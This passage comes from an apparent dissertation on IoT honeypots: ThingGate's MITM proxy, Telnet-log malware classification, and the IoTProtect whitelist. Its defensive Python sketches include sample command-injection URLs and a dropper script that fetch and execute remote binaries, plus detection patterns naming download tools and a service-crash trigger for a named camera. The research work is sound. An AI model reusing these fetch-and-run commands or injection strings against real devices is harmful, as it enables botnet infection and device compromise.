the IoT devices cannot capture the subsequent traffic or binaries from clients.

5. In SIPHON [5], Guarnizo et al. indicated that scanning for Wi-Fi networks is a feature often

offered in the admin interfaces of IP Cameras. The goal of SIPHON is to collect world-wide

cyber attacks against IoT via a few devices deployed locally. However, their research did not

mention whether the Wi-Fi Access Point (AP) names may expose the location. The Wi-Fi AP list

may dynamically show any scanned AP, including a Personal Hotspot from a passerby's mobile

device. The AP names shown in the WebUI may contain personal or organizational information, which can

expose the physical location of the honeypot.

To address the challenges of physical IoT devices, we propose ThingGate, a customized

MITM proxy for managing the flow between clients and a honeypot that consists of real IoT devices.

ThingGate achieves the following functionalities:

1. Incoming traffic management

We wish to block the incoming flow of unwanted or deadly attack vectors.

2. Extending functions of web tracking

Our proxy injects fingerprinting JavaScript codes through a MITM to track user clients.

3. Response information management

Our program checks the HTTP response from IoT devices and prevents the leakage or exposure

of sensitive information. Blocking Wi-Fi with an electromagnetic shielding container is costly.

We hope to prevent leakage through a light-weight and straightforward method.

4. Real-time analysis of misplaced cyber attack

IoT malware exploits various vulnerabilities in the WebUI of devices and injects OS commands

into the URL. However, some malware does not check the targeted device before sending malicious

HTTP requests. For a misplaced command injection URL (CI-URL) whose attack target is

not among our physical IoT devices, we can conduct real-time analysis and download tasks.
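The incoming traffic management and the handling of misplaced CI-URLs described above can be illustrated with a minimal Python sketch. It is not the ThingGate implementation: the rule sets, the `Verdict` names, the `triage` function, and every path other than get_status.cgi are hypothetical and only show how a proxy could decide whether to block a request, forward it to the physical device, or hand it to the analysis module.

```python
from enum import Enum
from urllib.parse import unquote, urlsplit


class Verdict(Enum):
    BLOCK = "block"      # deadly vector or critical configuration change
    FORWARD = "forward"  # pass on to the physical IoT device
    ANALYZE = "analyze"  # misplaced CI-URL, send to the analysis module


# Hypothetical rule sets; a real deployment would derive them per device.
BLOCKED_PATHS = {"/set_network.cgi", "/factory_reset.cgi"}
DEVICE_PATHS = {"/", "/get_status.cgi", "/snapshot.cgi", "/wifi_scan.cgi"}
SHELL_MARKERS = (";", "|", "`", "$(", "wget ", "curl ", "tftp ")


def triage(url):
    """Classify one request URL (path plus optional query string)."""
    parts = urlsplit(url)
    if parts.path in BLOCKED_PATHS:
        return Verdict.BLOCK
    if parts.path in DEVICE_PATHS:
        return Verdict.FORWARD
    # The path does not exist on our devices. If it carries OS-command
    # markers, treat it as a misplaced command injection URL.
    decoded = unquote(parts.path) + "?" + unquote(parts.query)
    if any(marker in decoded for marker in SHELL_MARKERS):
        return Verdict.ANALYZE
    return Verdict.FORWARD
```

For example, `triage("/get_status.cgi")` is forwarded, `triage("/set_network.cgi?ip=10.0.0.9")` is blocked, and a request such as `/setup.cgi?cmd=cd%20/tmp;wget%20x.sh` is routed to analysis because its path is unknown to the honeypot devices and its query contains shell syntax.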

3.2. Analysis of cyber attacks in IoT

IoT honeypots have successfully observed Botnets targeting IoT devices over the Telnet and HTTP

protocols. The observation yielded massive data of malware binaries and attack vector logs.

Besides, IoT malware continues to evolve, and the diversity of OS and environments increases

the difficulty of executing malware samples in dynamic analysis. To address these problems, we

develop an alternative means of investigation that uses the attack vectors and analyzes

malware without executing it. Moreover, we summarize the attack vectors to create an in-depth

view of cyber attacks in IoT.

The primary attack vector of cyber attacks in IoT is the Telnet protocol (75%)

[8]. Thus we focus on analyzing the Telnet logs and malware binaries. The dataset comes from the

honeypot consisting of physical IoT devices. To compress the data, we develop an encoding

method for mapping Telnet logs to simplified character sequences.
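To make the idea of the encoding concrete, the following Python sketch maps each command in a Telnet session to a single character. The symbol table, the `UNKNOWN` placeholder, and the function name `encode_session` are assumptions made for illustration; the actual mapping used in this work is not reproduced here.

```python
# Hypothetical command-to-symbol table (illustration only).
SYMBOLS = {
    "enable": "a", "system": "b", "shell": "c", "sh": "d",
    "busybox": "e", "cat": "f", "cd": "g", "wget": "h",
    "tftp": "i", "chmod": "j", "rm": "k", "echo": "l",
}
UNKNOWN = "z"  # any command that is not in the table


def encode_session(lines):
    """Map the commands of one Telnet session to a character sequence."""
    encoded = []
    for line in lines:
        # Treat ';', '&&' and '||' as command separators.
        normalized = line.replace("&&", ";").replace("||", ";")
        for command in normalized.split(";"):
            tokens = command.split()
            if not tokens:
                continue
            name = tokens[0].rsplit("/", 1)[-1]  # /bin/busybox -> busybox
            encoded.append(SYMBOLS.get(name, UNKNOWN))
            # "busybox wget ..." is encoded as busybox followed by the applet.
            if name == "busybox" and len(tokens) > 1 and tokens[1] in SYMBOLS:
                encoded.append(SYMBOLS[tokens[1]])
    return "".join(encoded)
```

With this table, the session `["enable", "sh", "/bin/busybox wget http://x/y; chmod 777 y", "./y"]` is compressed to the six-character sequence `adehjz`, which is far shorter than the raw log and can be compared with other sessions as a string.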

Further, we study and evaluate distance algorithms to find the best one for distinguishing these sequences

according to the malware families. We then extract key patterns of different interaction

behavior using an N-gram model. We employ both unsupervised and supervised learning

algorithms and text-mining algorithms for handling unstructured data. For unsupervised learning,

because cyber attacks in IoT keep evolving and the pattern of attacks is uncertain,

we choose the hierarchical clustering method, which does not require predefining

the number of clusters.
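The combination of an N-gram model with hierarchical clustering can be sketched as follows. This is an illustration under stated assumptions, not the evaluated method: the Jaccard distance over character bigrams stands in for whichever distance algorithm performs best, single linkage is one of several possible linkage criteria, and the threshold value is arbitrary. The point of the sketch is that the merge loop stops at a distance cut-off, so the number of clusters is never fixed in advance.

```python
def ngrams(sequence, n=2):
    """Set of character n-grams of an encoded command sequence."""
    return {sequence[i:i + n] for i in range(len(sequence) - n + 1)}


def jaccard_distance(a, b, n=2):
    """1 - |A & B| / |A | B| over the n-gram sets of a and b."""
    grams_a, grams_b = ngrams(a, n), ngrams(b, n)
    if not grams_a and not grams_b:
        return 0.0
    return 1.0 - len(grams_a & grams_b) / len(grams_a | grams_b)


def hierarchical_clusters(sequences, threshold=0.5, n=2):
    """Single-linkage agglomerative clustering with a distance cut-off."""
    clusters = [[i] for i in range(len(sequences))]

    def linkage(c1, c2):
        return min(jaccard_distance(sequences[i], sequences[j], n)
                   for i in c1 for j in c2)

    while len(clusters) > 1:
        best, i, j = min(
            (linkage(clusters[i], clusters[j]), i, j)
            for i in range(len(clusters))
            for j in range(i + 1, len(clusters))
        )
        if best > threshold:
            break  # the closest pair is too far apart; stop merging
        clusters[i] = clusters[i] + clusters[j]
        del clusters[j]
    return [sorted(cluster) for cluster in clusters]
```

For the four encoded sessions `["adehjz", "adehjzk", "gfgfgl", "gfgfglk"]`, the first two share five of six bigrams and the last two share three of four, while the two groups share none, so the sketch returns two clusters of two sessions each.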

For supervised learning algorithms, we propose a malware classification method based on

malware binaries, command sequences, and meta-features. Our approach trains a multiclass

classifier to identify IoT malware categories based on common infection behavior. For

misclassified subclasses, second-stage sub-training is performed using a file meta-feature. Finally,

we used a confusion matrix and accuracy to measure the classification result.
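As a small worked example of this measurement, the sketch below builds a confusion matrix from true and predicted category labels and derives the accuracy from its diagonal. The function names and the toy labels are illustrative assumptions and are not results of this study.

```python
from collections import Counter


def confusion_matrix(true_labels, predicted_labels):
    """Rows are true categories, columns are predicted categories."""
    labels = sorted(set(true_labels) | set(predicted_labels))
    counts = Counter(zip(true_labels, predicted_labels))
    matrix = [[counts[(t, p)] for p in labels] for t in labels]
    return labels, matrix


def accuracy(matrix):
    """Share of samples on the diagonal, i.e. correctly classified."""
    total = sum(sum(row) for row in matrix)
    correct = sum(matrix[i][i] for i in range(len(matrix)))
    return correct / total if total else 0.0
```

With the toy input `true = ["mirai", "mirai", "bashlite", "bashlite", "bashlite"]` and `pred = ["mirai", "bashlite", "bashlite", "bashlite", "bashlite"]`, one Mirai sample lands off the diagonal and the accuracy is 4/5.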

3.3. Countermeasure of cyber attacks in IoT

In the attack campaigns of IoT Botnets, the attacker typically uploads malware binaries to

a writable folder of the victim device. Besides, the filesystem and storage of low-cost IoT devices

are limited, and most files are read-only or generated by the Linux kernel on-the-fly. Therefore, the

whitelists contain only a few thousand entries. Based on these features, we propose IoTProtect, a

whitelisting method for protecting low-cost IoT devices. IoTProtect consists of three whitelists

and a checker program. The pathname whitelist is a list of pathnames of all legitimate executables.

The hash value whitelist records MD5 hash values of binaries on IoT devices. The comparison

and whitelist of cmdline content are optional and performed only if there are processes that cannot

display their pathname and exe links in the "proc" filesystem.

For the creation of whitelists, we assume that the device to be protected has already been

developed and that the device developer is to install IoTProtect on top of the existing system. We

skip the files coming from on-the-fly filesystems, such as sysfs, proc, usbfs, and I/O files. If

developers know precisely which executable files to include on the whitelist, they can create their

whitelist manually. However, recent IoT device products are often not developed by a single

manufacturer, and each developer does not know all of the legitimate executables exactly. In such

a case, developers can still create whitelists that include all executables existing in the system by

using the Linux command "find" with the "-exec" expression and "md5sum." Moreover, the

cmdline whitelist can be created by "find" with the "-exec" expression and "cat" Linux commands.
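The whitelist creation step can be sketched in Python as an equivalent of walking the filesystem and hashing every executable. This is only an illustration and not the IoTProtect tooling, which relies on the "find" and "md5sum" commands; the function names and the list of skipped mount points (`/proc`, `/sys`, `/dev`) are assumptions standing in for the on-the-fly filesystems mentioned above.

```python
import hashlib
import os

# Assumed mount points of on-the-fly filesystems to skip.
SKIPPED_ROOTS = ("/proc", "/sys", "/dev")


def is_skipped(directory):
    return any(directory == root or directory.startswith(root + "/")
               for root in SKIPPED_ROOTS)


def md5_of_file(path, chunk_size=65536):
    """MD5 hex digest of a file, read in chunks to keep memory use low."""
    digest = hashlib.md5()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_whitelists(root="/"):
    """Return (pathname whitelist, hash whitelist) for executables under root."""
    pathnames, hashes = set(), set()
    for directory, subdirs, files in os.walk(root):
        if is_skipped(directory):
            subdirs[:] = []  # do not descend into skipped filesystems
            continue
        for name in files:
            path = os.path.join(directory, name)
            if os.path.islink(path) or not os.access(path, os.X_OK):
                continue
            try:
                file_hash = md5_of_file(path)
            except OSError:
                continue  # unreadable file: leave it off the whitelists
            pathnames.add(path)
            hashes.add(file_hash)
    return pathnames, hashes
```

Because the result is two flat sets, membership checks at run time are simple lookups, which fits the observation that the whitelists of a low-cost device hold only a few thousand entries.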

IoTProtect first filters processes that are not included in the pathname whitelist and then filters

the remaining processes according to the hash value whitelist. It then filters the remainder with

the cmdline whitelists if there are any processes with no pathname and exe links. Finally, it

removes all remaining processes.
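The filtering order above can be expressed as a small decision function. The sketch below is one reading of the procedure under stated assumptions: the `Process` record and the function `processes_to_remove` are hypothetical, the process list is passed in rather than read from the "proc" filesystem, and the actual checker is a Bash script rather than Python.

```python
from typing import NamedTuple, Optional


class Process(NamedTuple):
    pid: int
    exe_path: Optional[str]  # resolved exe link, None if it cannot be read
    md5: Optional[str]       # MD5 of the executable, None if unavailable
    cmdline: str             # content of the process's cmdline entry


def processes_to_remove(processes, path_whitelist, hash_whitelist,
                        cmdline_whitelist=frozenset()):
    """Return the PIDs that fail the pathname, hash, or cmdline check."""
    doomed = []
    for proc in processes:
        if proc.exe_path is None:
            # No pathname or exe link: fall back to the optional cmdline list.
            if proc.cmdline not in cmdline_whitelist:
                doomed.append(proc.pid)
        elif proc.exe_path not in path_whitelist:
            doomed.append(proc.pid)
        elif proc.md5 not in hash_whitelist:
            doomed.append(proc.pid)
    return doomed
```

Checking the pathname before the hash means that a binary dropped into a writable folder is rejected without hashing it, while a whitelisted path whose content has been replaced is still caught by the hash comparison.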

In the dissertation, we conducted experiments with four actual IoT devices and 4,981 malware

binaries captured by our IoT honeypot for evaluation. We show four different experiments to

evaluate the effectiveness, overhead, and ease of deployment of IoTProtect.

Chapter 4.

ThingGate: A gateway for flexible operation of bare-metal IoT

honeypot

4.1. Introduction

In recent years, people have been connecting various things to the Internet for monitoring,

collecting data, or remote manipulation. Backend applications collect and exchange data with

these devices through the network. Such a network is called the Internet of Things

(IoT). However, the IoT malware “Mirai” was used to conduct a massive Distributed Denial

of Service (DDoS) attack against Dyn DNS in October 2016. About 100,000 Mirai

IoT Botnet nodes were enlisted in this incident, and reported attack rates were up to 1.2 Tbps [2].

Therefore, cyber threats from IoT Botnet have become a reality. To observe cyber attacks against

such devices and analyze the threats from IoT malware, some researchers design new observation

mechanisms and build various honeypots. These honeypots include, for example, IoTPOT [4],

SIPHON [5], IoTCandyJar [6], and real devices honeypot for observing Web UI of IoT devices

[7].

The competition between hackers and cybersecurity researchers is an endless war. IoT malware

keeps evolving and exploits multiple vulnerabilities to infect IoT devices. Since May 2018, the

Mirai and Bashlite malware families have assimilated multiple known exploits affecting Internet

of Things (IoT) devices. These exploits target devices from 11 makers over the HTTP, UPnP, Telnet,

and SOAP protocols [3]. Besides their well-known activities such as DDoS, recent IoT malware

has diverse purposes including coin mining, click fraud, and sending spam emails. In addition,

human attackers also utilize various tools to access and collect a variety of information on the device.

For example, the WebUI of many IP Cameras and routers is constantly searched for and accessed if

vulnerable. In order to observe and analyze such a variety of attacks in depth, there is an increasing

need for a bare-metal IoT honeypot, namely a real IoT device used as a honeypot, because it is costly to

emulate device-specific vulnerabilities and complicated functionalities provided through their

WebUI and other dedicated services, such as UPnP.

However, it is worth noting that operating bare-metal IoT honeypots has unique technical

challenges mostly coming from their low configurability as an embedded system. For example,

honeypot operators may need to control the incoming traffic since there are critical attacks that

may destroy firmware and/or change the network configuration of devices that could disconnect

the honeypot devices. Also, honeypot operators may need to mask and/or replace outgoing

responses from the honeypot devices as they may contain information such as surrounding

wireless access points, which could reveal the physical location of the honeypot devices.
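Masking of outgoing responses can be illustrated with a short Python sketch that replaces scanned access point names with fabricated ones before the page reaches the client. The HTML shape (`<td class="ssid">` cells), the fabricated names, and the function `mask_ssids` are assumptions for illustration; real devices use their own page formats, so a deployment would need one pattern per device.

```python
import itertools
import re

# Assumed response format: one '<td class="ssid">NAME</td>' cell per AP.
SSID_CELL = re.compile(r'(<td class="ssid">)(.*?)(</td>)', re.DOTALL)
FAKE_SSIDS = ("HOME-2G", "guest-wifi", "AP-0001")  # fabricated names


def mask_ssids(html):
    """Replace every scanned AP name with a fabricated one."""
    fake_names = itertools.cycle(FAKE_SSIDS)

    def substitute(match):
        return match.group(1) + next(fake_names) + match.group(3)

    return SSID_CELL.sub(substitute, html)
```

A response without any matching cell is returned unchanged, so the same filter can be applied to every page without affecting other content.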

4.2. Definitions

4.2.1. Man-in-the-middle

The man-in-the-middle (MITM) refers to an attack in which the attacker positions themselves

between two communicating parties and secretly relays or alters the communication between

these parties, who believe that they are engaging in direct communication with each other.

Messages intended for the legitimate site are passed to the attacker instead, who saves valuable

information, passes the messages to the legitimate site, and forwards the responses back to the

user. The MITM technique can be realized as a web proxy attack, in which a malicious web proxy receives

all web traffic from a compromised computer and relays it to a legitimate site. The proxy collects

credentials and other confidential information from the traffic. MITM flows are difficult to detect

because a legitimate site can appear to be functioning properly and the user may not be aware that

something is wrong [39]. We utilize the web proxy technique to monitor and manage the flow between

clients and our honeypot.

4.2.2. Transparent Proxy

In computer networks, a proxy server is a server that acts as an intermediary for requests from

clients seeking resources from other servers [40]. A proxy server can fulfill the request from the

client, filter it out, or modify it in a specific way. Transparent proxying

means that traffic is redirected into a proxy at the network layer, without any client configuration

[9]. The client is unaware that the response received originates from the proxy server and not from

the source server. We forward the flow through the MITM proxy by using pf of FreeBSD [41]

and socat [42].

4.2.3. Browser fingerprinting

Browser fingerprinting involves making a recognizable subset of users unique. The fingerprint

is primarily used as a global identifier for those users. Furthermore, we can utilize a global

identifier to create a web tracking mechanism for user browsers [43]. In 2012, Mowery and

Shacham presented canvas fingerprinting, which is a web fingerprinting algorithm [44]. They

demonstrated that the new HTML5 feature could be used to generate a relatively unique

fingerprint that could be used to track users. Canvas fingerprinting uses the browser’s Canvas API

to draw invisible images and extract a persistent, long-term fingerprint without the user’s

knowledge [45]. Tracking mechanisms have advanced such that these mechanisms are difficult to

control and detect and are resilient to blocking or removing. Another feature of canvas

fingerprinting is that the resulting fingerprint may differ from one browser to another on the same

machine [46]. In this study, we use fingerprintjs2 [47], which is an open-source library of canvas

fingerprinting, to achieve the web tracking function.

4.2.4. Cyber attacks against WebUI of Physical IoT Devices

In 2017, Ezawa et al. [7] proposed a honeypot consisting of physical IoT devices to observe attacks against the WebUI of IoT devices. The devices include IP Cameras, routers, pocket routers, a printer, and a TV receiver. In 2018, Tamiya et al. [17] employed five IP Cameras to build a decoy honeypot to capture the behavior of peeping attackers. Based on the observations from these two honeypots, we summarize four kinds of cyber attacks against the WebUI:

1. Configuration information theft attacks

If the device has an information disclosure vulnerability or weak credentials, the attacker can collect the configuration and parameters of the device through URLs such as get_status.cgi.

2. Modification of the configuration

According to the observation of the two honeypots, attackers may modify the DDNS, VPN,

credentials, and network configuration.

3. Snapshot attacks

Snapshot is a feature of IP Cameras that offers users a still image of the current live stream. When a client sends the HTTP request for a snapshot, the web server returns the current image as a JPG or PNG file.

4. Long term peeping

This attack is observed on IP Cameras when clients access the URL of the live stream and stay on the live stream web page for several hours.
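
The four categories above can be sketched as a simple lookup from the requested pathname to an attack category. This is a minimal illustration, not the classifier used in this study: the pathnames are those observed on our devices (see Table 5), while the mapping table and the function name `classify_request` are assumptions introduced here. Note that long term peeping is ultimately decided by how long a client stays on the stream, which a single request cannot show.

```python
from urllib.parse import urlsplit, unquote

# Pathnames observed on the honeypot devices; the mapping itself is an
# illustrative assumption, not the rule set used in the dissertation.
CATEGORY_BY_SCRIPT = {
    "get_params.cgi": "configuration information theft",
    "get_status.cgi": "configuration information theft",
    "set_network.cgi": "modification of the configuration",
    "decoder_control.cgi": "modification of the configuration",
    "snapshot.cgi": "snapshot",
    "livestream.cgi": "long term peeping",
    "videostream.cgi": "long term peeping",
}


def classify_request(url):
    """Return the attack category for a request URL, or "other"."""
    # Decode percent-escapes such as %5c and treat backslashes as separators.
    path = unquote(urlsplit(url).path).replace("\\", "/")
    script = path.rsplit("/", 1)[-1]
    return CATEGORY_BY_SCRIPT.get(script, "other")
```

A request for `/get_status.cgi` is mapped to configuration information theft, and the encoded path `/%5ccgi-bin/set_network.cgi` is decoded before the lookup.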

4.3. ThingGate

4.3.1. System goal

The use of conventional IoT devices for building new honeypots raises the following

challenges:

1. Poor expandability

The resources of IoT devices are limited, and installing additional libraries may require modifying the firmware.

2. Inconvenient reset or restore mechanism

The reset or recovery process requires manual operation on the devices. Many devices place the reset button on the control panel, and users have to hold the button for a while to trigger the reset function.

3. Threat of service-crashing attacks or bricking commands

Some attack vectors, such as BrickerBot, can impair devices [37]. BrickerBot prevents devices from working again even after a factory reset. Moreover, some vulnerabilities, such as CVE-2017-17020, may cause a service shutdown. Recovering from these types of attacks requires human resources for maintenance [38].

4. Misplaced cyber attacks in IoT flow

To analyze attack vectors against IoT devices, purchasing every physical IoT device to build a honeypot is not affordable, so we can only use a limited number of devices in a honeypot. If a device's weakness does not fit the incoming attack vector, the attack fails and the device cannot capture the subsequent flow or binaries from the client.

5. Exposure risk from the sensor information

In SIPHON [5], Guarnizo et al. indicated that scanning for Wi-Fi networks is a feature often offered in the admin interfaces of IP Cameras. The goal of SIPHON is to collect worldwide cyber attacks against IoT via a few devices deployed locally. However, their research did not mention whether the Wi-Fi Access Point (AP) names may expose the location. The Wi-Fi AP list may dynamically show any scanned AP, including a Personal Hotspot from a passerby's mobile device. An AP name shown in the WebUI may include personal or organizational information, which can expose the physical location of the honeypot.

ThingGate is a customized MITM proxy for managing flow between clients and the honeypot

that consists of physical IoT devices. To face the challenges from the honeypot of physical IoT

devices, we define the following goals.

1. Incoming traffic management

We wish to block the incoming flow of unwanted or deadly attack vectors.

2. Extending functions of web tracking

Our proxy injects fingerprinting JavaScript codes through a MITM to track user clients.


3. Response information management

Our program checks the HTTP response from IoT devices and prevents the leakage or exposure

of sensitive information. Blocking Wi-Fi with an electromagnetic shielding container is costly.

We hope to prevent leakage through a simple and light-weight method.

4. Real-time analysis of misplaced cyber attack

IoT malware exploits various vulnerabilities in the WebUI of devices and injects OS commands into the URL. However, some malware does not check the targeted device before sending malicious HTTP requests. For a misplaced command injection URL (CI-URL), whose attack target is not among our physical IoT devices, we can conduct real-time analysis and download tasks.

4.3.2. System Overview

Our design, which was inspired by SIPHON architecture [5], is displayed in Fig. 3. Our

honeypot consists solely of physical IoT devices. Moreover, SIPHON’s forwarder is improved

with an MITM proxy to manage the forward traffic from wormholes to local physical IoT devices.

We design a module to analyze some CI-URLs. These flows may target IoT devices other than

ours.

Fig. 3 System overview of ThingGate


Wormhole. The wormhole device contains some ports open to the general Internet on a public IP

address. We transparently forward the incoming traffic toward these ports through an MITM

proxy to a specific port on a remote physical IoT device. Forwarding is conducted through socat

[42], which is a command-line-based utility that establishes two bidirectional byte streams.

CI-URL Analysis and Downloader (CAD). If the flow contains features of CI-URLs, then we

redirect the HTTP request to CAD. CAD provides 200 response codes to the client and analyzes

the CI-URL. If CAD successfully extracts download links from the flow, real-time download

tasks of links can be conducted.

MITM Proxy. The socat utility passes the traffic between the wormhole and the IoT device through the MITM proxy, which accomplishes the protection and HTTP response rewriting tasks in real time. The proxy examines every flow and decides whether to block it, delegate it to the devices, or redirect it to the CI-URL analysis and downloader (CAD). The proxy modifies the flow in an MITM manner.

IoT Devices. IoT devices are typical commercial off-the-shelf devices that contain vulnerabilities.

In this system, we focus on cyber attacks against the WebUI of IoT devices. Thus, we only forward

incoming HTTP flow to its HTTP service ports.

Data Storage. The storage dumps traffic records from the wormholes and aggregates the data for

offline analysis. For example, Wireshark is used to analyze the headers of HTTP requests in

dumped traffic files.

4.3.3. System Architecture and Modules

The system architecture of the ThingGate system is displayed in Fig. 4. The MITM proxy

transparently manages the input and output flow of the honeypot constructed with physical IoT

devices in real time. IoT devices answer the flow delegated by the proxy and send the HTTP


response back to the client through the MITM proxy. Moreover, the proxy redirects specific HTTP

requests that contain CI-URLs to the CAD. Then CAD extracts links and downloads malware

binaries. Moreover, our proxy injects fingerprinting JavaScript codes into the HTTP response

content and replaces sensitive information with fabricated material.

Fig. 4 System Architecture of ThingGate

The details of the modules are as follows:

Request Controller. The request controller is in charge of incoming HTTP requests. The request

controller reviews every request and determines whether the flow should be directly forwarded to

IoT devices. The process of URL checking is illustrated in Fig. 5. First, we examine whether the

URLs utilize the dangerous vulnerability of our IoT devices. For example, D-Link’s IP Camera,

DCS-5020L, contains vulnerabilities in its WebUI. If attackers post a long string value to the URL

“/setSystemNetwork” in the form parameters, then the HTTP request causes the web service to

crash [48]. Therefore, the request controller replaces the URL with another valid URL. Second,


according to Ezawa’s study, some attackers change the DDNS, VPN, or network settings of IoT

devices [7] to prevent other clients from accessing the device. These attacks may incur the

necessity of performing manual tasks such as rebooting or resetting devices. Therefore, we must

protect these critical configurations. The request controller compares the URLs of the incoming

request, filters out the requests that cause unwanted configuration changes, and replaces these

URLs with other valid URLs of the WebUI. Third, our program verifies the operating system

(OS) commands and different URLs embedded in the URL. The request controller redirects these

CI-URLs to the CAD. Finally, the request controller forwards the remaining HTTP requests to

IoT devices.
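
The URL checking order described above can be sketched as a single decision function. This is a minimal sketch under stated assumptions: the `Action` enum, the rule tables, the replacement page `/index.htm`, and the regular expressions are hypothetical placeholders, and the example address 192.0.2.1 is a documentation address. The real prototype may detect CI-URLs differently.

```python
import re
from enum import Enum
from urllib.parse import urlsplit, unquote


class Action(Enum):
    REPLACE = "replace"                  # rewrite the URL to a harmless page
    REDIRECT_TO_CAD = "redirect_to_cad"  # hand the request to the CAD
    FORWARD = "forward"                  # pass the request to the IoT device


# Hypothetical rule tables; a deployment would list the paths of its own devices.
DANGEROUS_PATHS = {"/setSystemNetwork": "/index.htm"}
CONFIG_PATHS = {"/set_network.cgi": "/admin2.htm", "/set_ddns.cgi": "/ddns.htm"}

# Simplified CI-URL heuristic (an assumption): a shell download command
# together with a link to another site inside the decoded URL.
SHELL_COMMAND = re.compile(r"\b(wget|curl|tftp|busybox)\b")
EMBEDDED_LINK = re.compile(r"https?://[^\s;'\"|&]+")


def decide(raw_url):
    """Return (action, url) following the four checks in their stated order."""
    path = unquote(urlsplit(raw_url).path)
    if path in DANGEROUS_PATHS:      # 1. dangerous vulnerability of our devices
        return Action.REPLACE, DANGEROUS_PATHS[path]
    if path in CONFIG_PATHS:         # 2. critical configuration change
        return Action.REPLACE, CONFIG_PATHS[path]
    decoded = unquote(raw_url)
    if SHELL_COMMAND.search(decoded) and EMBEDDED_LINK.search(decoded):
        return Action.REDIRECT_TO_CAD, raw_url   # 3. CI-URL
    return Action.FORWARD, raw_url   # 4. everything else goes to the device
```

Keeping the checks in one ordered function makes the priority explicit: a request that both targets a protected path and carries an injected command is replaced rather than redirected.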

Fig. 5 The processing flow of Request controller

Response controller. The response controller is in charge of the HTTP responses from IoT devices. The following conditions trigger action by the response controller.

1. The HTTP response from IoT devices contains a body tag.

The response controller injects fingerprinting JavaScript codes into the body tag. The

JavaScript library creates a hash fingerprint if the client can support the JavaScript code.

2. The HTTP response includes sensitive information

In this method, we focus on the Wi-Fi AP list. The name of the Wi-Fi AP may consist of a

username or information concerning the organization or location. The response controller

replaces all APs with fabricated AP information.
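
As an illustration of the second condition, the replacement of AP names can be sketched with a regular expression substitution. The response format (`ap_ssid[n]='...'`), the fabricated names, and the function name are all assumptions made for this sketch; the actual format depends on the device firmware.

```python
import re
from itertools import cycle

# Hypothetical response format: one line per scanned AP, e.g.
#   var ap_ssid[0]='HomeNet';
SSID_FIELD = re.compile(r"(ap_ssid\[\d+\]=')([^']*)(')")

# Fabricated names that reveal nothing about people, organizations, or places.
FAKE_SSIDS = ["AP-01", "AP-02", "AP-03"]


def fabricate_ap_list(body):
    """Replace every scanned SSID in the response body with a fabricated one."""
    names = cycle(FAKE_SSIDS)
    return SSID_FIELD.sub(lambda m: m.group(1) + next(names) + m.group(3), body)
```

Only the SSID values are rewritten, so the page layout and the number of listed APs stay the same for the client.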

CI-URL Analyzer. The CI-URL analyzer is responsible for extracting download links from two sources: the CI-URLs and the downloaded scripts. The CI-URL analyzer includes two components, namely the URL

parser and script parser. The URL parser decodes the CI-URLs and transforms them into OS

commands (Fig. 6). The CI-URL in Fig. 6 utilizes the vulnerability of the D-Link router DSL-

2750B [49]. The URL parser decodes the CI-URL and extracts the link from the OS commands,

"http://yyy.yyy.173.159/d." The CI-URL analyzer also passes the link to the downloader.

Fig. 6 The encoded URL of CI-URL and decoded results

If we successfully download the file and the file is a shell script file (e.g., the script displayed

in Fig. 7), then the script parser analyzes the content, traverses all parameters, and extracts the

links of malware. Finally, the script parser passes the links of malware to the downloader.
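
The two parsers can be approximated by percent-decoding followed by link extraction. The sketch below is a simplification under stated assumptions: it uses one regular expression for both the decoded CI-URL and the script text, whereas the script parser described above traverses the script parameters. The function names are hypothetical and 192.0.2.1 is a documentation address.

```python
import re
from urllib.parse import unquote

# A link ends at whitespace or at a shell metacharacter.
LINK = re.compile(r"https?://[^\s;'\"|&<>`]+")


def decode_ci_url(ci_url):
    """URL parser step: turn the encoded CI-URL back into readable OS commands."""
    return unquote(ci_url)


def extract_links(text):
    """Return the download links found in decoded commands or a shell script."""
    links = []
    for link in LINK.findall(text):
        if link not in links:   # keep first-seen order, drop duplicates
            links.append(link)
    return links


ci_url = "/login.cgi?cli=aa%20aa%27;wget%20http://192.0.2.1/d%20-O%20/tmp/d;sh%20/tmp/d%27$"
commands = decode_ci_url(ci_url)
script = "cd /tmp; wget http://192.0.2.1/mips; chmod +x mips; ./mips\nwget http://192.0.2.1/arm7"
```

Here `extract_links(commands)` yields the script link, and `extract_links(script)` yields the two binary links that would be passed to the downloader.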


Fig. 7 Downloaded Scripts from CI-URL

Downloader. The downloader is responsible for downloading malware binaries. We found that the header values in HTTP requests issued by IoT devices can be distinguished from those issued by Unix/Linux server operating systems. For example, the user-agent value produced by the wget command on macOS Mojave 10.14.2 is "Wget/1.13.4 (darwin13.1.0)", where "darwin13.1.0" is a library name of macOS packages [50]. In contrast, the user-agent value produced by router A in Table 1 is "Wget/1.16 (linux-gnu)". The user-agent in the HTTP header may therefore expose information about the download client, so we customized our header values to appear as similar as possible to those of IoT devices.
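
A download request with device-like headers can be sketched with the Python standard library. The header set and the function names are assumptions for illustration; the user-agent string is modeled on the value reported for router A. Any real download of malware should of course run only inside an isolated analysis environment.

```python
import urllib.request

# Headers chosen to resemble wget on an embedded Linux device (assumption).
IOT_LIKE_HEADERS = {
    "User-Agent": "Wget/1.16 (linux-gnu)",
    "Accept": "*/*",
}


def build_request(link):
    """Create a request whose headers look like those of an IoT device."""
    return urllib.request.Request(link, headers=IOT_LIKE_HEADERS)


def download(link, timeout=10.0):
    """Fetch the file behind the link and return its raw bytes."""
    with urllib.request.urlopen(build_request(link), timeout=timeout) as response:
        return response.read()
```

Separating `build_request` from `download` lets the header values be inspected without any network access.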

4.4. Evaluation

4.4.1. Prototype and dataset

We developed a prototype of ThingGate using Python and the MITM proxy open-source

software [51]. We performed four different experiments with seven physical IoT devices to

evaluate the effectiveness of ThingGate. Table 1 presents the specification of our devices, all of

which contained vulnerabilities that had been publicly disclosed. We installed ThingGate on a server with a four-core 3.10 GHz Intel CPU, 16 GB of RAM, and a 1.8 TB disk.

Table 1 IoT devices used in experiments.

| IoT device | Maker’s country | CPU Arch. | Appr. price* (JPY) |
|---|---|---|---|
| Router A | Taiwan | MIPS | 26,000 |
| IP Camera A1 | China | ARM | 4,980 |
| IP Camera A2 | China | ARM | 4,980 |
| IP Camera A3 | China | ARM | 4,980 |
| IP Camera B | USA | ARM | 3,000 |
| IP Camera C | Taiwan | MIPS | 14,000 |
| IP Camera D | Taiwan | MIPS | 7,960 |

* We collected this price information from Amazon Japan on Oct. 1, 2018. IP Cameras A1~A3 are devices of the same model.

Table 2 presents the two datasets collected by our honeypot through ThingGate. From September

8 to October 13, 2018, we used five devices and 19 IP addresses to collect the attack flow (dataset

